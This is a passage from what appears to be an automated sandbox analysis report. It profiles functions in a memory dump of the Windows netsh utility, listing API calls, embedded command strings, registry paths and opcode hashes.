              • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(000000F5,?,01567F23,?,0156471D,000000B6,?), ref: 01567E38
              • LocalFree.API-MS-WIN-CORE-HEAP-L2-1-0(00000000,?,01567F23,?,0156471D), ref: 01567E51
              Strings
              • Error %d in FormatMessageW(), xrefs: 01567E27
              Memory Dump Source
              • Source File: 00000006.00000002.4142384381.0000000001560000.00000040.80000000.00040000.00000000.sdmp, Offset: 01560000, based on PE: true
              • Associated: 00000006.00000002.4142384381.0000000001579000.00000040.80000000.00040000.00000000.sdmp
              • Associated: 00000006.00000002.4142450745.000000000157C000.00000040.80000000.00040000.00000000.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_1560000_netsh.jbxd
              Similarity
              • API ID: ErrorFormatFreeHandleLastLocalMessagewprintf
              • String ID: Error %d in FormatMessageW()
              • API String ID: 10433382-1232673963
              • Opcode ID: 1416dfd445c978fe3dbdf4d7cd585314c0240752aba4eff048487216b02e75bd
              • Instruction ID: d4163ed304435a9ad420cd52fd37090b51d555daaa3cfc8283636b7bcdcd2f78
              • Opcode Fuzzy Hash: 1416dfd445c978fe3dbdf4d7cd585314c0240752aba4eff048487216b02e75bd
              • Instruction Fuzzy Hash: 71F04F76511124FFDB2197A5AC0E99F7A6CEB84675F110114F9119B284D6304E04D7E0
              APIs
              • GetSystemTimeAsFileTime.API-MS-WIN-CORE-SYSINFO-L1-1-0(00000000), ref: 01569B82
              • GetCurrentProcessId.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0 ref: 01569B91
              • GetCurrentThreadId.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0 ref: 01569B9A
              • GetTickCount.API-MS-WIN-CORE-SYSINFO-L1-1-0 ref: 01569BA3
              • QueryPerformanceCounter.API-MS-WIN-CORE-PROFILE-L1-1-0(?), ref: 01569BB8
              Memory Dump Source
              • Source File: 00000006.00000002.4142384381.0000000001560000.00000040.80000000.00040000.00000000.sdmp, Offset: 01560000, based on PE: true
              • Associated: 00000006.00000002.4142384381.0000000001579000.00000040.80000000.00040000.00000000.sdmp
              • Associated: 00000006.00000002.4142450745.000000000157C000.00000040.80000000.00040000.00000000.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_1560000_netsh.jbxd
              Similarity
              • API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
              • String ID:
              • API String ID: 1445889803-0
              • Opcode ID: 25db3a8d4b22288bf998b6bee93068d5730a23e3d51a9c306a6c66aa60ea8d95
              • Instruction ID: 676ed3d58b587e07e3c1ff4b728263c3c7d0ba62c138c5b05a9738c9307d46d9
              • Opcode Fuzzy Hash: 25db3a8d4b22288bf998b6bee93068d5730a23e3d51a9c306a6c66aa60ea8d95
              • Instruction Fuzzy Hash: 13111F71E05108DFCF20DFB8E64969EB7F8FF58314F624459D812EB218E6349A04DB50
              APIs
              • SetUnhandledExceptionFilter.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,?,01569816,01561000), ref: 015696E7
              • UnhandledExceptionFilter.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(01569816,?,01569816,01561000), ref: 015696F0
              • GetCurrentProcess.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0(C0000409,?,01569816,01561000), ref: 015696FB
              • TerminateProcess.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0(00000000,?,01569816,01561000), ref: 01569702
              Memory Dump Source
              • Source File: 00000006.00000002.4142384381.0000000001560000.00000040.80000000.00040000.00000000.sdmp, Offset: 01560000, based on PE: true
              • Associated: 00000006.00000002.4142384381.0000000001579000.00000040.80000000.00040000.00000000.sdmp
              • Associated: 00000006.00000002.4142450745.000000000157C000.00000040.80000000.00040000.00000000.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_1560000_netsh.jbxd
              Similarity
              • API ID: ExceptionFilterProcessUnhandled$CurrentTerminate
              • String ID:
              • API String ID: 3231755760-0
              • Opcode ID: eb3246e0889522affad0a65a2d047040cb8812d370dd9e6c74f14e63c00e87a3
              • Instruction ID: 59865d5e451faff138069c1139dcb6f9d01a60ba8bbe7087e1f58ca9982b658d
              • Opcode Fuzzy Hash: eb3246e0889522affad0a65a2d047040cb8812d370dd9e6c74f14e63c00e87a3
              • Instruction Fuzzy Hash: 04D0C932014144ABCB222BE1FC0EA593E38FB4427AF068004F72A8A004CB314409EB71
              APIs
              • memset.MSVCRT ref: 0156930D
              • GetVersionExW.API-MS-WIN-CORE-SYSINFO-L1-1-0(0000011C,?,?,?), ref: 01569326
                • Part of subcall function 01564F00: _vsnwprintf.MSVCRT ref: 01564F32
              Strings
              Memory Dump Source
              • Source File: 00000006.00000002.4142384381.0000000001560000.00000040.80000000.00040000.00000000.sdmp, Offset: 01560000, based on PE: true
              • Associated: 00000006.00000002.4142384381.0000000001579000.00000040.80000000.00040000.00000000.sdmp
              • Associated: 00000006.00000002.4142450745.000000000157C000.00000040.80000000.00040000.00000000.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_1560000_netsh.jbxd
              Similarity
              • API ID: Version_vsnwprintfmemset
              • String ID: %d.%d.%d
              • API String ID: 413895009-3144769927
              • Opcode ID: 5b9993c77d801cee0ebd537a8d52ea3b2c417e0cc3b12f3f87c89535f16cde86
              • Instruction ID: 4e1e1e30adc7ff8f0741d1c0eed70e14602eb4519d4c1e1503bf005695fd50ee
              • Opcode Fuzzy Hash: 5b9993c77d801cee0ebd537a8d52ea3b2c417e0cc3b12f3f87c89535f16cde86
              • Instruction Fuzzy Hash: 651187B0A002197AD7609F62EC0AFFFBABCFBD5B14F004059F9146F244DA745954E7A1
              APIs
              • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,00000000,015671E2), ref: 015640AE
              • HeapFree.API-MS-WIN-CORE-HEAP-L1-1-0(00000000), ref: 015640B5
              Memory Dump Source
              • Source File: 00000006.00000002.4142384381.0000000001560000.00000040.80000000.00040000.00000000.sdmp, Offset: 01560000, based on PE: true
              • Associated: 00000006.00000002.4142384381.0000000001579000.00000040.80000000.00040000.00000000.sdmp
              • Associated: 00000006.00000002.4142450745.000000000157C000.00000040.80000000.00040000.00000000.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_1560000_netsh.jbxd
              Similarity
              • API ID: Heap$FreeProcess
              • String ID:
              • API String ID: 3859560861-0
              • Opcode ID: 4602f5275e7bedb2b9e1dcbb8da4525097b23e6156707eb2f7da1fb8ea962c4a
              • Instruction ID: eacf288ec3b74369a4164529bb208b1e4d540f63d41d2ad7bda06acf442f417a
              • Opcode Fuzzy Hash: 4602f5275e7bedb2b9e1dcbb8da4525097b23e6156707eb2f7da1fb8ea962c4a
              • Instruction Fuzzy Hash: DCF080757113219FEB349E65F89AB7AB769FB40736F02401DD5198F184CB705808FB90
              APIs
              • SetUnhandledExceptionFilter.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(Function_000098E0), ref: 01569935
              Memory Dump Source
              • Source File: 00000006.00000002.4142384381.0000000001560000.00000040.80000000.00040000.00000000.sdmp, Offset: 01560000, based on PE: true
              • Associated: 00000006.00000002.4142384381.0000000001579000.00000040.80000000.00040000.00000000.sdmp
              • Associated: 00000006.00000002.4142450745.000000000157C000.00000040.80000000.00040000.00000000.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_1560000_netsh.jbxd
              Similarity
              • API ID: ExceptionFilterUnhandled
              • String ID:
              • API String ID: 3192549508-0
              • Opcode ID: 370ffb5c0d39128dc9f9fd64e922d031e92eddb678ca0daa85ae697a222d20a1
              • Instruction ID: d6c8979a733dcdc1f8021a2f915c025c572d5c7e6e329d0ce0a09094af7ac104
              • Opcode Fuzzy Hash: 370ffb5c0d39128dc9f9fd64e922d031e92eddb678ca0daa85ae697a222d20a1
              • Instruction Fuzzy Hash: AA900260265150CA8A111F736C1A80565986A4855A7424858A111CD008DF704004F671
              APIs
              • memset.MSVCRT ref: 01566C2D
              • memset.MSVCRT ref: 01566C3D
              • HeapSetInformation.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,00000001,00000000,00000000), ref: 01566C74
              • GetModuleHandleW.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(00000000), ref: 01566C7B
              • wprintf.MSVCRT ref: 01566C94
              Strings
              Memory Dump Source
              • Source File: 00000006.00000002.4142384381.0000000001560000.00000040.80000000.00040000.00000000.sdmp, Offset: 01560000, based on PE: true
              • Associated: 00000006.00000002.4142384381.0000000001579000.00000040.80000000.00040000.00000000.sdmp
              • Associated: 00000006.00000002.4142450745.000000000157C000.00000040.80000000.00040000.00000000.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_1560000_netsh.jbxd
              Similarity
              • API ID: memset$HandleHeapInformationModulewprintf
              • String ID: %s$%s>$GetModuleHandle failed$MprmsgGetErrorString$api-ms-win-appmodel-runtime-l1-1-0.dll$mprmsg.dll$netsh$netsh.exe
              • API String ID: 2957350143-4264442765
              • Opcode ID: 7b61d59160e850ead5ebe8af8498987c3942ce51087cad80c21c0471e1449823
              • Instruction ID: f51f7d629c6cbcb19a8d8a9368e76ea5820c515b39bca7c770df4a995f29eee4
              • Opcode Fuzzy Hash: 7b61d59160e850ead5ebe8af8498987c3942ce51087cad80c21c0471e1449823
              • Instruction Fuzzy Hash: B5F1F775A00627DBDB319F25EC89AADB7BDFB44224F4040AAE4069F144DB319E84CFE5
              APIs
              • MatchToken.NETSH(?,help), ref: 01562879
                • Part of subcall function 01567690: _wcsnicmp.MSVCRT ref: 015676BC
              • MatchToken.NETSH(?,015612B0,?,help), ref: 01562891
              • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,?,015612B0,?,help), ref: 015628A6
              • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000), ref: 015628AD
              • MatchTagsInCmdLine.NETSH(?,?,?,mode,00000002,00000000), ref: 015628D8
              • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,00000000), ref: 015628E6
              • HeapFree.API-MS-WIN-CORE-HEAP-L1-1-0(00000000), ref: 015628ED
              Strings
              Memory Dump Source
              • Source File: 00000006.00000002.4142384381.0000000001560000.00000040.80000000.00040000.00000000.sdmp, Offset: 01560000, based on PE: true
              • Associated: 00000006.00000002.4142384381.0000000001579000.00000040.80000000.00040000.00000000.sdmp
              • Associated: 00000006.00000002.4142450745.000000000157C000.00000040.80000000.00040000.00000000.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_1560000_netsh.jbxd
              Similarity
              • API ID: Heap$Match$ProcessToken$AllocFreeLineTags_wcsnicmp
              • String ID: append$close$help$mode$name$open
              • API String ID: 60316392-503993532
              • Opcode ID: d485c39989d9969d515b13a962ec76ea861542ab80e97cbb009f970ad1d21312
              • Instruction ID: edab77d8e227ddb44bca1847d6404b73c36903d95264a2e7b283291e29f2233f
              • Opcode Fuzzy Hash: d485c39989d9969d515b13a962ec76ea861542ab80e97cbb009f970ad1d21312
              • Instruction Fuzzy Hash: C091D871A002199FDF228FA8E889EAE7BBDFB48364F050119E515FF290D7709D04DBA1
              APIs
              • MatchToken.NETSH(?,help), ref: 0156261F
              • MatchToken.NETSH(?,015612B0,?,help), ref: 01562638
              • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,?,015612B0,?,help), ref: 0156264D
              • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000), ref: 01562654
              • MatchTagsInCmdLine.NETSH(01561284,?,?,?,00000003,00000000), ref: 0156267C
              • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?), ref: 0156268D
              • _wcsicmp.MSVCRT ref: 0156272F
              • PrintMessageFromModule.NETSH(000000A9,?), ref: 0156274D
              • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,00000208), ref: 0156275B
              • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000), ref: 01562762
              • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,00000000,?), ref: 0156278C
              • HeapFree.API-MS-WIN-CORE-HEAP-L1-1-0(00000000), ref: 01562793
              • HeapFree.API-MS-WIN-CORE-HEAP-L1-1-0(00000000), ref: 01562694
                • Part of subcall function 01566A15: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,?,00000000,?), ref: 01566A4C
                • Part of subcall function 01566A15: HeapFree.API-MS-WIN-CORE-HEAP-L1-1-0(00000000), ref: 01566A53
                • Part of subcall function 01566A15: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,?,00000000,?), ref: 01566A85
                • Part of subcall function 01566A15: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000), ref: 01566A8C
              • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,00000000,00000000), ref: 015627B6
              • HeapFree.API-MS-WIN-CORE-HEAP-L1-1-0(00000000), ref: 015627BD
              • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,00000000), ref: 015627C9
              • HeapFree.API-MS-WIN-CORE-HEAP-L1-1-0(00000000), ref: 015627D0
              • PrintMessageFromModule.NETSH(00003AA0), ref: 015627F1
              Memory Dump Source
              • Source File: 00000006.00000002.4142384381.0000000001560000.00000040.80000000.00040000.00000000.sdmp, Offset: 01560000, based on PE: true
              • Associated: 00000006.00000002.4142384381.0000000001579000.00000040.80000000.00040000.00000000.sdmp
              • Associated: 00000006.00000002.4142450745.000000000157C000.00000040.80000000.00040000.00000000.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_1560000_netsh.jbxd
              Similarity
              • API ID: Heap$Process$Free$AllocMatch$FromMessageModulePrintToken$LineTags_wcsicmp
              • String ID: help$name$pwd$user
              • API String ID: 1986014345-3860914806
              • Opcode ID: be0983bc5a858d81d8e266b8ab998093e9c3bee4652394af5e6bca109e02eef5
              • Instruction ID: 1e7c72b983da6b3efdc30a65fb5caca854657bd8aea21d4c6b443d3e74fb83b9
              • Opcode Fuzzy Hash: be0983bc5a858d81d8e266b8ab998093e9c3bee4652394af5e6bca109e02eef5
              • Instruction Fuzzy Hash: 7C6190B16183029FD7219F69D889A6E7BEDBB88714F05091DF949DF244DB34C9048BA2
              APIs
              • lstrcmpiW.API-MS-WIN-CORE-STRING-OBSOLETE-L1-1-0(?,01561A54,?,?,?), ref: 01568A94
              • memcmp.MSVCRT ref: 01568AA4
              • lstrcmpiW.API-MS-WIN-CORE-STRING-OBSOLETE-L1-1-0(?,ras,?,?), ref: 01568AD8
              • MatchToken.NETSH(?,diagnostics,?,?), ref: 01568B1C
              • MatchToken.NETSH(?,set,?,diagnostics,?,?), ref: 01568B31
              • MatchToken.NETSH(?,show,?,set,?,diagnostics,?,?), ref: 01568B42
              • MatchToken.NETSH(?,tracing,?,set,?,diagnostics,?,?), ref: 01568B54
              • MatchToken.NETSH(?,user,?,tracing,?,set,?,diagnostics,?,?), ref: 01568B66
              • MatchToken.NETSH(?,add,?,user,?,tracing,?,set,?,diagnostics,?,?), ref: 01568B77
              • MatchToken.NETSH(?,delete,?,add,?,user,?,tracing,?,set,?,diagnostics,?,?), ref: 01568B88
              • MatchToken.NETSH(?,dump,?,delete,?,add,?,user,?,tracing,?,set,?,diagnostics,?,?), ref: 01568B99
              • MatchToken.NETSH(?,set,?,dump,?,delete,?,add,?,user,?,tracing,?,set,?,diagnostics), ref: 01568BAA
              • MatchToken.NETSH(?,show,?,set,?,dump,?,delete,?,add,?,user,?,tracing,?,set), ref: 01568BBB
              Memory Dump Source
              • Source File: 00000006.00000002.4142384381.0000000001560000.00000040.80000000.00040000.00000000.sdmp, Offset: 01560000, based on PE: true
              • Associated: 00000006.00000002.4142384381.0000000001579000.00000040.80000000.00040000.00000000.sdmp
              • Associated: 00000006.00000002.4142450745.000000000157C000.00000040.80000000.00040000.00000000.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_1560000_netsh.jbxd
              Similarity
              • API ID: MatchToken$lstrcmpi$memcmp
              • String ID: add$delete$diagnostics$dump$ras$set$show$tracing$user
              • API String ID: 4174612407-597535005
              • Opcode ID: e0f9a0498fda055fcdea31d75530a768b82fdc4c61160a12379d936e919056f5
              • Instruction ID: 4f330c6428a463be8de8b0f210f97b03ddbacd494628e3647081801d9bdd602a
              • Opcode Fuzzy Hash: e0f9a0498fda055fcdea31d75530a768b82fdc4c61160a12379d936e919056f5
              • Instruction Fuzzy Hash: 824180706007079EDB52AF2EC886ABEBAADBF94648F44442DD542EF125E7719911CBC0
              APIs
              • PrintMessage.NETSH([%1!s!] ,?), ref: 015667C7
              • PrintMessage.NETSH(01574AE0), ref: 015667DD
              • lstrcmpiW.API-MS-WIN-CORE-STRING-OBSOLETE-L1-1-0(netsh,0156B2F0), ref: 015667F0
              • PrintMessageFromModule.NETSH(000003EF,015617F4,015617E0), ref: 0156682B
                • Part of subcall function 01567EA0: LoadStringW.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(0156471D,?,?,00004000,?,00000000,?,?,0156471D,000000B6,?), ref: 01567ED0
                • Part of subcall function 01567EA0: GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(0156471D,GetResourceString,?,0156471D,000000B6,?), ref: 01567EE2
              • PrintMessage.NETSH(%1!s!>,netsh), ref: 01566847
              • iswctype.MSVCRT(?,00000008,00000000,?,?), ref: 0156686D
              • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,00000000,?,?), ref: 015668AD
              • HeapFree.API-MS-WIN-CORE-HEAP-L1-1-0(00000000), ref: 015668B4
              • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,00000000,?,?,00000000,?,?), ref: 015668EB
              • HeapFree.API-MS-WIN-CORE-HEAP-L1-1-0(00000000), ref: 015668F2
              • ProcessCommand.NETSH(?,?), ref: 015668FF
              • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?), ref: 0156691C
              • HeapFree.API-MS-WIN-CORE-HEAP-L1-1-0(00000000), ref: 01566923
              • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?), ref: 01566935
              • HeapFree.API-MS-WIN-CORE-HEAP-L1-1-0(00000000), ref: 0156693C
              Memory Dump Source
              • Source File: 00000006.00000002.4142384381.0000000001560000.00000040.80000000.00040000.00000000.sdmp, Offset: 01560000, based on PE: true
              • Associated: 00000006.00000002.4142384381.0000000001579000.00000040.80000000.00040000.00000000.sdmp
              • Associated: 00000006.00000002.4142450745.000000000157C000.00000040.80000000.00040000.00000000.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_1560000_netsh.jbxd
              Similarity
              • API ID: Heap$Process$FreeMessagePrint$AddressCommandFromLoadModuleProcStringiswctypelstrcmpi
              • String ID: %1!s!>$[%1!s!] $netsh
              • API String ID: 1372608480-1238292096
              • Opcode ID: 013dec69786dd268eed701a5e3499189bca3bbc0f9c708f50832faf4dada4a46
              • Instruction ID: ab8aa4687e479a2fbaea19f4750b60ea005f5c9034d4d2ddbf5d0362af7a097e
              • Opcode Fuzzy Hash: 013dec69786dd268eed701a5e3499189bca3bbc0f9c708f50832faf4dada4a46
              • Instruction Fuzzy Hash: F8510871E10216EFDB219FB9D8498AEB7FDFF44614B11041AE915EF240EB708944DBE0
              APIs
              • MatchToken.NETSH(?,help), ref: 01562B5B
                • Part of subcall function 01567690: _wcsnicmp.MSVCRT ref: 015676BC
              • MatchToken.NETSH(?,015612B0,?,help), ref: 01562B70
              • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,00000004,?,015612B0,?,help), ref: 01562B80
              • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000), ref: 01562B87
              • MatchTagsInCmdLine.NETSH(?,?,015612B8,mode,00000001,00000000), ref: 01562BAD
              • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,00000000), ref: 01562BBB
              • HeapFree.API-MS-WIN-CORE-HEAP-L1-1-0(00000000), ref: 01562BC2
              Memory Dump Source
              • Source File: 00000006.00000002.4142384381.0000000001560000.00000040.80000000.00040000.00000000.sdmp, Offset: 01560000, based on PE: true
              • Associated: 00000006.00000002.4142384381.0000000001579000.00000040.80000000.00040000.00000000.sdmp
              • Associated: 00000006.00000002.4142450745.000000000157C000.00000040.80000000.00040000.00000000.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_1560000_netsh.jbxd
              Similarity
              • API ID: Heap$Match$ProcessToken$AllocFreeLineTags_wcsnicmp
              • String ID: help$mode$offline$online
              • API String ID: 60316392-1053974117
              • Opcode ID: aca0eac9b704f15d272ccfddedc924c99fbac09db48c159f8604493894f8b232
              • Instruction ID: cb5fedfddcf2c484bd64823d66db63d43acc0df9954a9fb5a4086c2a0c830ab9
              • Opcode Fuzzy Hash: aca0eac9b704f15d272ccfddedc924c99fbac09db48c159f8604493894f8b232
              • Instruction Fuzzy Hash: 23510472A00507AFEB229FA8D849BAE7BBDFB84314F014024E915AF258DB309D05CBD1
              APIs
              • _wcsicmp.MSVCRT ref: 01563D15
              • RegOpenKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(80000002,SOFTWARE\Microsoft\NetSh,00000000,000F003F,01563978), ref: 01563D87
              • RegDeleteValueW.API-MS-WIN-CORE-REGISTRY-L1-1-0(01563978,?), ref: 01563DA2
              • RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0(01563978), ref: 01563DAD
              • PrintMessageFromModule.NETSH(000003E9,?), ref: 01563DC3
              • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?), ref: 01563DE3
              • HeapFree.API-MS-WIN-CORE-HEAP-L1-1-0(00000000), ref: 01563DEA
              • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?), ref: 01563DFD
              • HeapFree.API-MS-WIN-CORE-HEAP-L1-1-0(00000000), ref: 01563E04
              • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?), ref: 01563E1E
              • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000), ref: 01563E25
              • memcpy.MSVCRT ref: 01563E43
              • memcpy.MSVCRT ref: 01563E67
              • FreeLibrary.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(?), ref: 01563EA8
              • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?), ref: 01563EB7
              • HeapFree.API-MS-WIN-CORE-HEAP-L1-1-0(00000000), ref: 01563EBE
              Strings
              • SOFTWARE\Microsoft\NetSh, xrefs: 01563D7D
              Memory Dump Source
              • Source File: 00000006.00000002.4142384381.0000000001560000.00000040.80000000.00040000.00000000.sdmp, Offset: 01560000, based on PE: true
              • Associated: 00000006.00000002.4142384381.0000000001579000.00000040.80000000.00040000.00000000.sdmp
              • Associated: 00000006.00000002.4142450745.000000000157C000.00000040.80000000.00040000.00000000.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_1560000_netsh.jbxd
              Similarity
              • API ID: Heap$FreeProcess$memcpy$AllocCloseDeleteFromLibraryMessageModuleOpenPrintValue_wcsicmp
              • String ID: SOFTWARE\Microsoft\NetSh
              • API String ID: 915751017-276136757
              • Opcode ID: fbea5d0f635231b01e88f717cf4a921d0d9f6235b77cbb591f0378f5f5e71252
              • Instruction ID: 2833951a7f68683a2490d7212dbdf8437e1a5374f9b2f6af62a40594cf61f8b7
              • Opcode Fuzzy Hash: fbea5d0f635231b01e88f717cf4a921d0d9f6235b77cbb591f0378f5f5e71252
              • Instruction Fuzzy Hash: 0551D8B1E10111AFCB618FA8F88EA6DBBBCFB44368B164415E919DF245C730DD04DBA0
              APIs
              • RegOpenKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(80000002,SOFTWARE\Microsoft\NetSh,00000000,00020019,?), ref: 01563EFB
              • RegQueryInfoKeyW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,00000000,00000000), ref: 01563F20
              • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,?), ref: 01563F44
              • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000), ref: 01563F4B
              • PrintMessageFromModule.NETSH(00000068), ref: 01563F5F
              • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,?), ref: 01563F6F
              • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000), ref: 01563F76
              • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,00000000), ref: 01563F84
              • HeapFree.API-MS-WIN-CORE-HEAP-L1-1-0(00000000), ref: 01563F8B
              • RegEnumValueW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,00000000,00000000,?,00000000,00000000,00000000,?), ref: 01563FBA
              • RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0(00000000), ref: 01563FE7
              • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,00000000), ref: 01563FF3
              • HeapFree.API-MS-WIN-CORE-HEAP-L1-1-0(00000000), ref: 01563FFA
              • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,00000000), ref: 01564006
              • HeapFree.API-MS-WIN-CORE-HEAP-L1-1-0(00000000), ref: 0156400D
              Strings
              • SOFTWARE\Microsoft\NetSh, xrefs: 01563EEA
              Memory Dump Source
              • Source File: 00000006.00000002.4142384381.0000000001560000.00000040.80000000.00040000.00000000.sdmp, Offset: 01560000, based on PE: true
              • Associated: 00000006.00000002.4142384381.0000000001579000.00000040.80000000.00040000.00000000.sdmp
              • Associated: 00000006.00000002.4142450745.000000000157C000.00000040.80000000.00040000.00000000.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_1560000_netsh.jbxd
              Similarity
              • API ID: Heap$Process$Free$Alloc$CloseEnumFromInfoMessageModuleOpenPrintQueryValue
              • String ID: SOFTWARE\Microsoft\NetSh
              • API String ID: 1499200800-276136757
              • Opcode ID: 574aaf270e0eec6c9e3f1ee7c53528c5ac4cf6293e1a5e63837fcc0f1fa78e74
              • Instruction ID: f3882739ba752b6375e0849dc1b6c31d872b4dd974a3e2030a0f7dc060cba092
              • Opcode Fuzzy Hash: 574aaf270e0eec6c9e3f1ee7c53528c5ac4cf6293e1a5e63837fcc0f1fa78e74
              • Instruction Fuzzy Hash: 84419571910119BFDB219BA9EC8DEAFBBBCFB44725F110025B56DEB144DA348904DBB0
              APIs
              • MatchToken.NETSH(?,help,?,00000000,00000000,?,?,?,01564AEF,?,00000002,?,?,?,00000000), ref: 015658A5
                • Part of subcall function 01567690: _wcsnicmp.MSVCRT ref: 015676BC
              • MatchToken.NETSH(?,015612B0,?,help,?,00000000,00000000,?,?,?,01564AEF,?,00000002,?,?,?), ref: 015658B6
              • PrintError.NETSH(00000000,00000000,?,01564AEF,?,00000002,?,?,?,00000000,?,?,00000000), ref: 015658FA
              • lstrcmpiW.API-MS-WIN-CORE-STRING-OBSOLETE-L1-1-0(?,netsh,?,00000000,00000000,?,?,?,01564AEF,?,00000002,?,?,?,00000000), ref: 01565913
              • PrintError.NETSH(00000000,00003A99,?,01564AEF,?,00000002,?,?,?,00000000,?,?,00000000), ref: 01565961
              • PrintMessageFromModule.NETSH(00000000,00000002,?,01564AEF,?,00000002,?,?,?,00000000,?,?,00000000), ref: 0156597E
              • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,00000000,?,01564AEF,?,00000002,?,?,?,00000000), ref: 015659CE
              • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,01564AEF,?,00000002,?,?,?,00000000), ref: 015659D5
              • PrintMessageFromModule.NETSH(?,?,00000000,?,0156131C,00000000,?,01564AEF,?,00000002,?,?,?,00000000), ref: 01565A10
              • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,00000000), ref: 01565A1C
              • HeapFree.API-MS-WIN-CORE-HEAP-L1-1-0(00000000), ref: 01565A23
              • PrintMessageFromModule.NETSH(?,?,?,?,01564AEF,?,00000002,?,?,?,00000000), ref: 01565A33
                • Part of subcall function 01567EA0: LoadStringW.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(0156471D,?,?,00004000,?,00000000,?,?,0156471D,000000B6,?), ref: 01567ED0
                • Part of subcall function 01567EA0: GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0(0156471D,GetResourceString,?,0156471D,000000B6,?), ref: 01567EE2
              • PrintMessage.NETSH(01561320,?,01564AEF,?,00000002,?,?,?,00000000,?,?,00000000), ref: 01565A55
              Memory Dump Source
              • Source File: 00000006.00000002.4142384381.0000000001560000.00000040.80000000.00040000.00000000.sdmp, Offset: 01560000, based on PE: true
              • Associated: 00000006.00000002.4142384381.0000000001579000.00000040.80000000.00040000.00000000.sdmp
              • Associated: 00000006.00000002.4142450745.000000000157C000.00000040.80000000.00040000.00000000.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_6_2_1560000_netsh.jbxd
              Similarity
              • API ID: Print$HeapMessage$FromModule$ErrorMatchProcessToken$AddressAllocFreeLoadProcString_wcsnicmplstrcmpi
              • String ID: help$netsh
              • API String ID: 691894897-4263905064
